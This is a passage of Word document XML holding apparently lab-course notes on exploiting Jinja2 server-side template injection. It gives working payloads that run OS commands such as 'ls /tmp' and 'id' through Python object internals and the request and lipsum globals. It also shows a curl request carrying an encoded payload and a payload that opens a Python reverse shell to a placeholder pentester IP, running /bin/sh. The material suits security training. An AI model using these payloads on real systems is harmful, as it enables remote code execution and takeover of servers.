          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;form action="/execute" method="get"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;a&gt;C:\&gt;&lt;input type="text" name="cmd" id="command"&gt;&lt;/a&gt;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&lt;a&gt;0&lt;/a&gt;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&lt;input type="submit" value="execute"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="11ED7BE6" wp14:textId="2F20083A">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>The application returns 0 in its response. This is the return of the value of the command we just executed. 0 indicates that the command was executed without errors.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="3DE82D59" wp14:textId="4F74DA78">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We can identify if test1 was created using the following payload.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="5983310D" wp14:textId="1AE9B611">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4500E6E0" wp14:textId="7958A0C2">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{{''.__class__.__mro__[1].__subclasses__()[214]()._module.__builtins__['__import__']('os').popen('ls /tmp').read()}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="4CC1EFF1" wp14:textId="305DFA38">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl - Interacting with the Target </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="399DFCDD" wp14:textId="4FCC522B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ curl -gs "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:&lt;PORT&gt;/execute?cmd=%7B%7B%27%27.__class__.__mro__%5B1%5D.__subclasses__%28%29%5B214%5D%28%29._module.__builtins__%5B%27__import__%27%5D%28%27os%27%29.popen%28%27ls%20%2Ftmp%27%29.read%28%29%7D%7D"</w:t>
      </w:r>
      <w:r>
        <w:br/>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r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div id="desktop"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;div class="window" data-title="Run"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;form action="/execute" method="get"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;a&gt;C:\&gt;&lt;input type="text" name="cmd" id="command"&gt;&lt;/a&gt;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&lt;a&gt;test1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>tmpv4tucw2b</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;br/&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;input type="submit" value="execute"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;SNIP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="5CACF5A0" wp14:textId="3BE5A2B5">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Now that we have gone through the payload development process, it's worth mentioning that we can use some specific functions to facilitate the exploitation of Jinja2 SSTI vulnerabilities. Those are request and lipsum. Feel free to submit them to this section's target.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="71B469A1" wp14:textId="49C279D7">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31E41A39" wp14:textId="317D46C4">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{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="771A5FFB" wp14:textId="0AAC8C61">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2D503431" wp14:textId="3EF6662E">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{{lipsum.__globals__.os.popen('id').read()}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="7B7BBE50" wp14:textId="0FF63A0E">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>A reverse shell can also be established through a payload such as the below.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="08E31B36" wp14:textId="31E60B14">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: python</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="0D032AE8" wp14:textId="02D8C4FB">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="17A9D6FC" w:rsidR="17A9D6FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>{{''.__class__.__mro__[1].__subclasses__()[214]()._module.__builtins__['__import__']('os').popen('python -c \'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("&lt;PENTESTER_IP&gt;",&lt;PENTESTER_PORT&gt;));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\'').read()}}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="17A9D6FC" wp14:paraId="2DC08235" wp14:textId="062ADF1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2A11AD"/>
    <w:rsid w:val="17A9D6FC"/>
    <w:rsid w:val="5A2A11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11AD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8CA5AFDD-D4D5-4F3B-B116-F40D161DDF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atalerrors.org/a/0dhx1Dk.html" TargetMode="External" Id="Rc849aba0c57c4f80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/python/cpython/blob/3.9/Lib/warnings.py" TargetMode="External" Id="Re1c8c6f03d8c4b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2023-12-13T15:53:18.0769397Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-13T15:54:13.7580005Z</dcterms:modified>
  <dc:creator>Aleksandar Milosavljevic</dc:creator>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>